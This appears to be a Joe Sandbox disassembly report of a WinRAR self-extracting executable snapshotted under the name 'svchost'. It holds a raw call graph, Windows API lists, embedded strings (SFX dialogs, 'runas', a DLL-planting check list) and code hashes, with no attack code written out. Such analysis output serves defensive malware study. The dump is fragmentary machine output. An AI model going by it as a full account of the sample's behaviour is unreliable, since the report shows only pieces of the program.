7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25949->25950 25950->25951 25951->25946 25953 7ff669ab8a74 25952->25953 25955 7ff669ab8a9d 25952->25955 26011 7ff669ad6b68 31 API calls 2 library calls 25953->26011 25955->25910 25957 7ff669ab9d6c swprintf 46 API calls 25956->25957 25958 7ff669ab8823 25957->25958 25959 7ff669ac055c WideCharToMultiByte 25958->25959 25960 7ff669ab883b 25959->25960 25961 7ff669ab8a34 31 API calls 25960->25961 25962 7ff669ab8853 25961->25962 25963 7ff669ad1d90 _handle_error 8 API calls 25962->25963 25964 7ff669ab8863 25963->25964 25964->25914 25964->25923 26012 7ff669aa2380 GetClassNameW 25965->26012 25967 7ff669aa22f1 25968 7ff669aa1fa8 31 API calls 25967->25968 25969 7ff669aa2340 25968->25969 25970 7ff669ad1d90 _handle_error 8 API calls 25969->25970 25971 7ff669aa2350 25970->25971 25971->25928 25973 7ff669ad94f2 25972->25973 25974 7ff669ad94da 25972->25974 25973->25974 25975 7ff669ad94fc 25973->25975 25999 7ff669adc5dc 15 API calls _set_fmode 25974->25999 26001 7ff669ad7494 35 API calls 2 library calls 25975->26001 25978 7ff669ad94df 26000 7ff669ad6834 31 API calls _invalid_parameter_noinfo 25978->26000 25980 7ff669ad1d90 _handle_error 8 API calls 25982 7ff669ab9713 25980->25982 25981 7ff669ad950d __scrt_get_show_window_mode 26002 7ff669ad7414 15 API calls _set_fmode 25981->26002 25982->25935 25984 7ff669ad9578 26003 7ff669ad789c 46 API calls 3 library calls 25984->26003 25986 7ff669ad9581 25987 7ff669ad9589 25986->25987 25988 7ff669ad95b8 25986->25988 26004 7ff669adc7d8 25987->26004 25990 7ff669ad9610 25988->25990 25991 7ff669ad95c7 25988->25991 25992 7ff669ad9636 25988->25992 25995 7ff669ad95be 25988->25995 25996 7ff669adc7d8 __free_lconv_num 15 API calls 25990->25996 25994 7ff669adc7d8 __free_lconv_num 15 API calls 25991->25994 25992->25990 25993 7ff669ad9640 25992->25993 25997 7ff669adc7d8 __free_lconv_num 15 API calls 25993->25997 25998 7ff669ad94ea 25994->25998 25995->25990 25995->25991 25996->25998 25997->25998 
25998->25980 25999->25978 26000->25998 26001->25981 26002->25984 26003->25986 26005 7ff669adc7dd RtlFreeHeap 26004->26005 26009 7ff669adc80d __free_lconv_num 26004->26009 26006 7ff669adc7f8 26005->26006 26005->26009 26010 7ff669adc5dc 15 API calls _set_fmode 26006->26010 26008 7ff669adc7fd GetLastError 26008->26009 26009->25998 26010->26008 26011->25955 26013 7ff669aa23e8 26012->26013 26014 7ff669aa12c0 33 API calls 26013->26014 26015 7ff669aa23f6 26014->26015 26016 7ff669ad1d90 _handle_error 8 API calls 26015->26016 26017 7ff669aa2409 26016->26017 26017->25967 26021 7ff669ad1c4b 26018->26021 26019 7ff669ad1c64 26019->25568 26021->26019 26022 7ff669ad1c6a 26021->26022 26029 7ff669adab00 26021->26029 26023 7ff669ad1c75 26022->26023 26032 7ff669ad289c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26022->26032 26033 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26023->26033 26034 7ff669adab40 26029->26034 26032->26023 26039 7ff669ade2d8 EnterCriticalSection 26034->26039 26043 7ff669aa3cac 26040->26043 26042 7ff669acc938 RegCreateKeyExW 26042->25577 26042->25578 26044 7ff669aa3cc3 26043->26044 26046 7ff669aa3cda BuildCatchObjectHelperInternal 26043->26046 26044->26046 26047 7ff669aa1490 33 API calls 3 library calls 26044->26047 26046->26042 26047->26046 26050 7ff669ab2a5f 26048->26050 26049 7ff669ab2a8c 26068 7ff669ab2680 26049->26068 26050->26049 26051 7ff669ab2a78 CreateDirectoryW 26050->26051 26051->26049 26053 7ff669ab2b2c 26051->26053 26055 7ff669ab2b3c 26053->26055 26155 7ff669ab3108 26053->26155 26059 7ff669ad1d90 _handle_error 8 API calls 26055->26059 26056 7ff669ab2b40 GetLastError 26056->26055 26061 7ff669ab2b68 26059->26061 26061->25584 26062 7ff669ab2acf CreateDirectoryW 26063 7ff669ab2aea 26062->26063 26064 7ff669ab2b23 26063->26064 26065 7ff669ab2b7d 26063->26065 26064->26053 26064->26056 26066 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26065->26066 26067 
7ff669ab2b82 26066->26067 26069 7ff669ab26a8 26068->26069 26070 7ff669ab26ab GetFileAttributesW 26068->26070 26069->26070 26071 7ff669ab26bc 26070->26071 26078 7ff669ab273c 26070->26078 26073 7ff669ab5d18 49 API calls 26071->26073 26072 7ff669ad1d90 _handle_error 8 API calls 26074 7ff669ab2750 26072->26074 26075 7ff669ab26e6 26073->26075 26074->26056 26082 7ff669ab5d18 26074->26082 26076 7ff669ab2703 26075->26076 26077 7ff669ab26ea GetFileAttributesW 26075->26077 26076->26078 26079 7ff669ab2760 26076->26079 26077->26076 26078->26072 26080 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26079->26080 26081 7ff669ab2765 26080->26081 26083 7ff669ab5d57 26082->26083 26098 7ff669ab5d50 26082->26098 26085 7ff669aa12c0 33 API calls 26083->26085 26084 7ff669ad1d90 _handle_error 8 API calls 26086 7ff669ab2acb 26084->26086 26087 7ff669ab5d89 26085->26087 26086->26062 26086->26063 26088 7ff669ab5da9 26087->26088 26089 7ff669ab5fda 26087->26089 26091 7ff669ab5dc3 26088->26091 26113 7ff669ab5e60 26088->26113 26090 7ff669ab55f8 35 API calls 26089->26090 26092 7ff669ab5ffc 26090->26092 26093 7ff669ab63bb 26091->26093 26169 7ff669aa2af0 4 API calls 2 library calls 26091->26169 26094 7ff669ab61fd 26092->26094 26096 7ff669ab6030 26092->26096 26152 7ff669ab5e5b 26092->26152 26190 7ff669aa200c 33 API calls std::_Xinvalid_argument 26093->26190 26100 7ff669ab63df 26094->26100 26187 7ff669aa2af0 4 API calls 2 library calls 26094->26187 26102 7ff669ab63cd 26096->26102 26172 7ff669aa2af0 4 API calls 2 library calls 26096->26172 26097 7ff669ab63c1 26110 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26097->26110 26098->26084 26193 7ff669aa200c 33 API calls std::_Xinvalid_argument 26100->26193 26191 7ff669aa200c 33 API calls std::_Xinvalid_argument 26102->26191 26103 7ff669ab63e5 26111 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26103->26111 26105 7ff669ab5e1e 26114 7ff669aa1fa8 31 API calls 26105->26114 26121 7ff669ab5e2f 
BuildCatchObjectHelperInternal 26105->26121 26106 7ff669ab63b6 26118 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26106->26118 26107 7ff669ab6267 26188 7ff669aa11ec 33 API calls BuildCatchObjectHelperInternal 26107->26188 26119 7ff669ab63c7 26110->26119 26112 7ff669ab63eb 26111->26112 26125 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26125 26120 7ff669aa12c0 33 API calls 26113->26120 26113->26152 26114->26121 26116 7ff669ab63d3 26128 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26116->26128 26117 7ff669aa1fa8 31 API calls 26117->26152 26118->26093 26123 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26119->26123 26126 7ff669ab5eda 26120->26126 26121->26117 26122 7ff669ab627a 26189 7ff669ab4b34 33 API calls BuildCatchObjectHelperInternal 26122->26189 26123->26102 26124 7ff669aa1fa8 31 API calls 26138 7ff669ab6107 26124->26138 26129 7ff669ab63f1 26125->26129 26170 7ff669ab4ba8 33 API calls 26126->26170 26131 7ff669ab63d9 26128->26131 26192 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 26131->26192 26132 7ff669ab608d BuildCatchObjectHelperInternal 26132->26116 26132->26124 26133 7ff669ab5ef0 26171 7ff669aad5bc 33 API calls 2 library calls 26133->26171 26134 7ff669aa1fa8 31 API calls 26137 7ff669ab62fc 26134->26137 26140 7ff669aa1fa8 31 API calls 26137->26140 26143 7ff669ab6132 26138->26143 26173 7ff669aa1754 26138->26173 26139 7ff669ab628a BuildCatchObjectHelperInternal 26139->26112 26139->26134 26142 7ff669ab6306 26140->26142 26141 7ff669aa1fa8 31 API calls 26145 7ff669ab5f80 26141->26145 26146 7ff669aa1fa8 31 API calls 26142->26146 26143->26131 26147 7ff669aa12c0 33 API calls 26143->26147 26149 7ff669aa1fa8 31 API calls 26145->26149 26146->26152 26150 7ff669ab61d0 26147->26150 26148 7ff669ab5f06 BuildCatchObjectHelperInternal 26148->26119 26148->26141 26149->26152 26186 7ff669aa2044 33 API calls BuildCatchObjectHelperInternal 26150->26186 26152->26097 26152->26098 26152->26103 
26152->26106 26153 7ff669ab61ed 26154 7ff669aa1fa8 31 API calls 26153->26154 26154->26152 26156 7ff669ab312f 26155->26156 26157 7ff669ab3132 SetFileAttributesW 26155->26157 26156->26157 26158 7ff669ab31cc 26157->26158 26159 7ff669ab3148 26157->26159 26161 7ff669ad1d90 _handle_error 8 API calls 26158->26161 26160 7ff669ab5d18 49 API calls 26159->26160 26163 7ff669ab3170 26160->26163 26162 7ff669ab31e1 26161->26162 26162->26055 26164 7ff669ab3174 SetFileAttributesW 26163->26164 26165 7ff669ab3193 26163->26165 26164->26165 26165->26158 26166 7ff669ab31f1 26165->26166 26167 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26166->26167 26168 7ff669ab31f6 26167->26168 26169->26105 26170->26133 26171->26148 26172->26132 26174 7ff669aa18ac 26173->26174 26177 7ff669aa1794 26173->26177 26194 7ff669aa200c 33 API calls std::_Xinvalid_argument 26174->26194 26176 7ff669aa18b2 26195 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26176->26195 26177->26176 26178 7ff669ad1c40 4 API calls 26177->26178 26183 7ff669aa17d3 BuildCatchObjectHelperInternal 26177->26183 26178->26183 26184 7ff669aa1864 BuildCatchObjectHelperInternal 26183->26184 26185 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26183->26185 26184->26143 26185->26174 26186->26153 26187->26107 26188->26122 26189->26139 26192->26100 26197 7ff669ab1502 26196->26197 26198 7ff669ab14ea 26196->26198 26199 7ff669ab1526 26197->26199 26202 7ff669aaaca4 96 API calls 26197->26202 26198->26197 26200 7ff669ab14f6 CloseHandle 26198->26200 26199->25627 26200->26197 26202->26199 26213 7ff669ab89a8 26203->26213 26206 7ff669aba284 LoadStringW 26207 7ff669aba2b2 26206->26207 26208 7ff669aba29d LoadStringW 26206->26208 26207->25641 26208->26207 26209->25641 26211->25641 26220 7ff669ab8870 26213->26220 26216 7ff669ab8a34 31 API calls 26217 7ff669ab8a0d 26216->26217 26218 7ff669ad1d90 _handle_error 8 API calls 26217->26218 26219 7ff669ab8a26 26218->26219 26219->26206 
26219->26207 26221 7ff669ab88c7 26220->26221 26229 7ff669ab8965 26220->26229 26222 7ff669ab88f5 26221->26222 26223 7ff669ac055c WideCharToMultiByte 26221->26223 26226 7ff669ab8924 26222->26226 26230 7ff669ab9d14 45 API calls 2 library calls 26222->26230 26223->26222 26224 7ff669ad1d90 _handle_error 8 API calls 26225 7ff669ab8999 26224->26225 26225->26216 26225->26217 26231 7ff669ad6b68 31 API calls 2 library calls 26226->26231 26229->26224 26230->26226 26231->26229 26233 7ff669aca30b 26232->26233 26234 7ff669aca312 26232->26234 26233->25744 26234->26233 26235 7ff669aa1754 33 API calls 26234->26235 26235->26234 26237 7ff669ac9d6c 26236->26237 26259 7ff669ac9fdb 26236->26259 26238 7ff669acc924 33 API calls 26237->26238 26240 7ff669ac9d8e 26238->26240 26239 7ff669ad1d90 _handle_error 8 API calls 26241 7ff669ac9fec 26239->26241 26242 7ff669aa12c0 33 API calls 26240->26242 26241->25717 26243 7ff669ac9dd1 26242->26243 26244 7ff669aa12c0 33 API calls 26243->26244 26245 7ff669ac9e0c 26244->26245 26246 7ff669aa12c0 33 API calls 26245->26246 26247 7ff669ac9e42 26246->26247 26248 7ff669aca134 35 API calls 26247->26248 26249 7ff669ac9e68 26248->26249 26251 7ff669aca019 26249->26251 26252 7ff669aca01f 26249->26252 26253 7ff669aa3cac 33 API calls 26249->26253 26256 7ff669ac9f60 26249->26256 26264 7ff669aca013 26249->26264 26250 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26250->26251 26254 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26251->26254 26255 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26252->26255 26253->26256 26254->26252 26257 7ff669aca025 26255->26257 26256->26257 26258 7ff669aca00e 26256->26258 26256->26259 26260 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26257->26260 26262 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26258->26262 26259->26239 26261 7ff669aca02b 26260->26261 26263 7ff669aa26c8 63 API calls 26261->26263 26262->26264 26265 7ff669aca07f 26263->26265 26264->26250 26266 
7ff669aca083 26265->26266 26267 7ff669aca102 SetDlgItemTextW 26265->26267 26268 7ff669aca095 26265->26268 26269 7ff669ad1d90 _handle_error 8 API calls 26266->26269 26267->26266 26268->26266 26271 7ff669aca0a1 26268->26271 26272 7ff669aca0b6 26268->26272 26270 7ff669aca128 26269->26270 26270->25717 26271->26266 26273 7ff669aca0a9 EndDialog 26271->26273 26397 7ff669abb444 99 API calls 26272->26397 26273->26266 26275 7ff669aca0e2 26276 7ff669aca0ee EndDialog 26275->26276 26276->26266 26283 7ff669aced91 __scrt_get_show_window_mode 26277->26283 26293 7ff669acf0df 26277->26293 26278 7ff669aa1fa8 31 API calls 26279 7ff669acf0fe 26278->26279 26280 7ff669ad1d90 _handle_error 8 API calls 26279->26280 26281 7ff669acf10a 26280->26281 26281->25744 26282 7ff669aceeeb 26285 7ff669aa12c0 33 API calls 26282->26285 26283->26282 26398 7ff669ac0ad8 CompareStringW 26283->26398 26286 7ff669acef2a 26285->26286 26287 7ff669ab266c 51 API calls 26286->26287 26288 7ff669acef34 26287->26288 26289 7ff669aa1fa8 31 API calls 26288->26289 26292 7ff669acef3f 26289->26292 26290 7ff669acefaf ShellExecuteExW 26291 7ff669acf0a8 26290->26291 26299 7ff669acefc2 26290->26299 26291->26293 26297 7ff669acf15d 26291->26297 26292->26290 26295 7ff669aa12c0 33 API calls 26292->26295 26293->26278 26294 7ff669aceffb 26400 7ff669acf658 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26294->26400 26296 7ff669acef84 26295->26296 26399 7ff669ab4ee4 53 API calls 2 library calls 26296->26399 26301 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26297->26301 26298 7ff669acf04d CloseHandle 26302 7ff669acf06b 26298->26302 26303 7ff669acf05c 26298->26303 26299->26294 26299->26298 26308 7ff669acefee ShowWindow 26299->26308 26306 7ff669acf162 26301->26306 26302->26291 26311 7ff669acf099 ShowWindow 26302->26311 26401 7ff669ac0ad8 CompareStringW 26303->26401 26305 7ff669acef92 26310 7ff669aa1fa8 31 API calls 26305->26310 26308->26294 26309 7ff669acf013 26309->26298 26313 7ff669acf021 
GetExitCodeProcess 26309->26313 26312 7ff669acef9c 26310->26312 26311->26291 26312->26290 26313->26298 26314 7ff669acf034 26313->26314 26314->26298 26316->25744 26317->25744 26318->25744 26319->25744 26321 7ff669aca162 26320->26321 26322 7ff669aca165 RegOpenKeyExW 26320->26322 26321->26322 26323 7ff669aca2b6 26322->26323 26326 7ff669aca189 26322->26326 26324 7ff669aa3cac 33 API calls 26323->26324 26325 7ff669aca2c1 26324->26325 26325->25744 26327 7ff669aca2a7 RegCloseKey 26326->26327 26328 7ff669aa13c4 33 API calls 26326->26328 26327->26323 26327->26325 26329 7ff669aca1f1 26328->26329 26330 7ff669aca268 26329->26330 26331 7ff669aca244 26329->26331 26402 7ff669ac8fc0 33 API calls 2 library calls 26329->26402 26330->26327 26332 7ff669aca2a2 26330->26332 26334 7ff669aca2de 26330->26334 26335 7ff669aa20c0 33 API calls 26331->26335 26332->26327 26336 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26334->26336 26335->26330 26337 7ff669aca2e3 26336->26337 26338->25744 26339->25744 26340->25744 26341->25744 26343 7ff669ab65ee 26342->26343 26403 7ff669aaab08 26343->26403 26347 7ff669ab25a4 26346->26347 26348 7ff669ab25a7 DeleteFileW 26346->26348 26347->26348 26349 7ff669ab25bd 26348->26349 26356 7ff669ab263f 26348->26356 26351 7ff669ab5d18 49 API calls 26349->26351 26350 7ff669ad1d90 _handle_error 8 API calls 26352 7ff669ab2654 26350->26352 26353 7ff669ab25e5 26351->26353 26352->25744 26354 7ff669ab25e9 DeleteFileW 26353->26354 26355 7ff669ab2606 26353->26355 26354->26355 26355->26356 26357 7ff669ab2664 26355->26357 26356->26350 26358 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26357->26358 26359 7ff669ab2669 26358->26359 26360->25744 26363 7ff669aa144a GetTempPathW 26362->26363 26364 7ff669aa13cd 26362->26364 26363->25744 26365 7ff669aa13ee 26364->26365 26366 7ff669aa145a 26364->26366 26369 7ff669aa13f7 __scrt_get_show_window_mode 26365->26369 26370 7ff669ad1c40 4 API calls 26365->26370 26408 7ff669aa2020 33 API calls std::_Xinvalid_argument 
26366->26408 26407 7ff669aa1988 31 API calls _invalid_parameter_noinfo_noreturn 26369->26407 26370->26369 26372->25744 26373->25744 26374->25744 26375->25744 26377 7ff669ab70c8 26376->26377 26378 7ff669ab70e1 26377->26378 26379 7ff669ab7113 26377->26379 26381 7ff669aa12c0 33 API calls 26378->26381 26409 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 26379->26409 26383 7ff669ab7105 26381->26383 26382 7ff669ab7118 26383->25744 26384->25744 26385->25744 26386->25678 26389->25652 26390->25655 26391->25663 26392->25702 26397->26275 26398->26282 26399->26305 26400->26309 26401->26302 26402->26331 26406 7ff669aaab52 __scrt_get_show_window_mode 26403->26406 26404 7ff669ad1d90 _handle_error 8 API calls 26405 7ff669aaabe9 26404->26405 26405->25744 26406->26404 26407->26363 26409->26382 26411 7ff669abd34a 26410->26411 26452 7ff669aa2164 26411->26452 26413 7ff669abd35e wcscpy 26413->25760 26415 7ff669abd308 26414->26415 26416 7ff669aa2164 33 API calls 26415->26416 26417 7ff669abd35e wcscpy 26416->26417 26417->25764 26457 7ff669ab793c 26418->26457 26420 7ff669aad823 26467 7ff669aada84 31 API calls BuildCatchObjectHelperInternal 26420->26467 26422 7ff669aad940 26425 7ff669ad1c40 4 API calls 26422->26425 26423 7ff669aad9cc 26426 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26423->26426 26424 7ff669aad8be 26424->26422 26424->26423 26427 7ff669aad95c 26425->26427 26435 7ff669aad9d1 26426->26435 26468 7ff669ac295c 99 API calls 26427->26468 26429 7ff669aad989 26431 7ff669ad1d90 _handle_error 8 API calls 26429->26431 26430 7ff669ab0cce 26433 7ff669ab0d19 26430->26433 26436 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26430->26436 26434 7ff669aad9b0 26431->26434 26432 7ff669aa1fa8 31 API calls 26432->26435 26433->25766 26434->25766 26435->26430 26435->26432 26435->26433 26437 7ff669ab0d47 26436->26437 26441 7ff669aadc8a 26438->26441 26439 7ff669aadd07 26442 7ff669aade3d 26439->26442 26443 7ff669aadd44 26439->26443 26441->26439 26441->26443 
26484 7ff669ab3244 26441->26484 26444 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26442->26444 26445 7ff669aaddaa 26443->26445 26491 7ff669aaea34 26443->26491 26448 7ff669aade42 26444->26448 26450 7ff669aaddff 26445->26450 26527 7ff669aa32fc 79 API calls 2 library calls 26445->26527 26447 7ff669ad1d90 _handle_error 8 API calls 26449 7ff669aade28 26447->26449 26449->25768 26450->26447 26453 7ff669aa2191 26452->26453 26454 7ff669aa218b __scrt_get_show_window_mode 26452->26454 26453->26454 26456 7ff669aa21d8 33 API calls 4 library calls 26453->26456 26454->26413 26456->26454 26458 7ff669ab795a 26457->26458 26459 7ff669ad1c40 4 API calls 26458->26459 26460 7ff669ab797f 26459->26460 26461 7ff669ab7993 26460->26461 26469 7ff669aa9a54 26460->26469 26463 7ff669ad1c40 4 API calls 26461->26463 26464 7ff669ab79a9 26463->26464 26465 7ff669ab79bb 26464->26465 26466 7ff669aa9a54 33 API calls 26464->26466 26465->26420 26466->26465 26467->26424 26468->26429 26474 7ff669ad1f10 26469->26474 26472 7ff669ad1f10 33 API calls 26473 7ff669aa9aad __scrt_get_show_window_mode 26472->26473 26473->26461 26476 7ff669ad1f41 26474->26476 26475 7ff669aa9a82 26475->26472 26476->26475 26478 7ff669aa9af0 26476->26478 26481 7ff669abb0d0 26478->26481 26480 7ff669aa9b02 26480->26476 26482 7ff669aa13c4 33 API calls 26481->26482 26483 7ff669abb0f5 26482->26483 26483->26480 26485 7ff669ab65d0 8 API calls 26484->26485 26486 7ff669ab325d 26485->26486 26487 7ff669ab328b 26486->26487 26528 7ff669ab341c 26486->26528 26487->26441 26490 7ff669ab3276 FindClose 26490->26487 26492 7ff669aaea59 _snwprintf 26491->26492 26567 7ff669aa33a8 26492->26567 26495 7ff669aaea8d 26498 7ff669aaecdf 26495->26498 26584 7ff669aa3ef4 26495->26584 26806 7ff669aa36e0 26498->26806 26499 7ff669aaeab9 26499->26498 26616 7ff669aa45c4 26499->26616 26506 7ff669aa8a94 33 API calls 26508 7ff669aaeb19 26506->26508 26822 7ff669ab6be4 48 API calls 2 library calls 26508->26822 26511 7ff669aaecbe 26511->26498 26632 7ff669aa6754 

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                      • API String ID: 1496594111-2013832382
                                      • Opcode ID: 3c5b7e40dabb33de2872f4ead57213b737540d03d5136472ac52588d3dd5022b
                                      • Instruction ID: a24a544c5bea87611f38bba23d9e1cdc1afd8d225716b3e56ecbcdbd8b4a92c1
                                      • Opcode Fuzzy Hash: 3c5b7e40dabb33de2872f4ead57213b737540d03d5136472ac52588d3dd5022b
                                      • Instruction Fuzzy Hash: AE32BA75A09BC6D9EB219F24E8402E933F4FB88358F504236DE4D9A769EF38D658D340
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Item$DialogMessageSendTextWindow
                                      • String ID: %s %s$-el%u -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxpipe
                                      • API String ID: 2770254507-1933896953
                                      • Opcode ID: 47fd72c8dc3dfeed7b071f927e3ab4048e50031a0989bb058ad7985187d95abc
                                      • Instruction ID: 61dce6997932d73b6e014a610afeb15b5472b1f5bcdfe01d9ef351758befa653
                                      • Opcode Fuzzy Hash: 47fd72c8dc3dfeed7b071f927e3ab4048e50031a0989bb058ad7985187d95abc
                                      • Instruction Fuzzy Hash: CDE29C62A096C6C2EB209F25E8942FA73B1FF8A794F404635DD4D8F6A6DE7CE544C340
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: .lnk$.tmp$<br>$=$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                      • API String ID: 0-81786609
                                      • Opcode ID: 150e0092323b8f52df7a9fddb3b8ccbf727525693b14de4d2849245d68b3973c
                                      • Instruction ID: c75896b782af68b676bf3515725040222e0f608207a0b19e0df183e11f59a9d5
                                      • Opcode Fuzzy Hash: 150e0092323b8f52df7a9fddb3b8ccbf727525693b14de4d2849245d68b3973c
                                      • Instruction Fuzzy Hash: 91039162E08A82D9EB10DF64D8402FC37F1EB95798F501636EE0D9EA99DF78E585C340

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$CurrentHandleObject$AddressDeleteDirectoryModuleProc$CloseCommandDialogIconInformationInitializeLineLoadLocalMallocParamProcessSleepTimeUserswprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxpipe
                                      • API String ID: 2472672504-4073604590
                                      • Opcode ID: 2d5a130e2447de21d2a193f423de8e68c9d137093d14339f823ff5af5c5eca19
                                      • Instruction ID: d6b06fb300a4300716a6c023d8cf1dc222ed8068d22e0cf6624d9ba0523e86c8
                                      • Opcode Fuzzy Hash: 2d5a130e2447de21d2a193f423de8e68c9d137093d14339f823ff5af5c5eca19
                                      • Instruction Fuzzy Hash: 1C12AB62E08B96C5EB10DF24E8451BD73B1BF89794F404231EE5D8EAAADF6CE545C340

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMessageMetricsMultiSendSystemWideswprintf
                                      • String ID: $%s:$CAPTION$ComboBox
                                      • API String ID: 3712066475-505312980
                                      • Opcode ID: 9ca0a9535a6f528d9f625c2520a76509113134b1d5fd78addab9c38dcd152dff
                                      • Instruction ID: 6984b6f71b2d4d7ccd12c6c8ead12e35d88c264f8139abf97838b70b4e20e788
                                      • Opcode Fuzzy Hash: 9ca0a9535a6f528d9f625c2520a76509113134b1d5fd78addab9c38dcd152dff
                                      • Instruction Fuzzy Hash: CEB1D332A186458AE718DF69E9046BA7BB1FBC5784F445135EE8D8BB98CF3CE405CB40

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                      • String ID: PNG
                                      • API String ID: 211097158-364855578
                                      • Opcode ID: a25f39ae10c779b16d69999f18453697fb6aa4e96e536294cb6300c2a78311ad
                                      • Instruction ID: 273f7374d5a47f4f3b0a00b918eedd02001978ab48b4bedc84ec930aa50a27b3
                                      • Opcode Fuzzy Hash: a25f39ae10c779b16d69999f18453697fb6aa4e96e536294cb6300c2a78311ad
                                      • Instruction Fuzzy Hash: 4B41E561A09B46C2EA449F6AA49437973F0BF88B94F080435DE1D8F3A4EF7DE849D340

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \
                                      • API String ID: 0-2967466578
                                      • Opcode ID: 4d609d334797011dc6cd8311e4f56762f9d6096ae8a39f9c464939cf813380c9
                                      • Instruction ID: ee6e7c830f44b4dccd3a660cf34592f154ccc2abc476f275817ba9ab46ec2d53
                                      • Opcode Fuzzy Hash: 4d609d334797011dc6cd8311e4f56762f9d6096ae8a39f9c464939cf813380c9
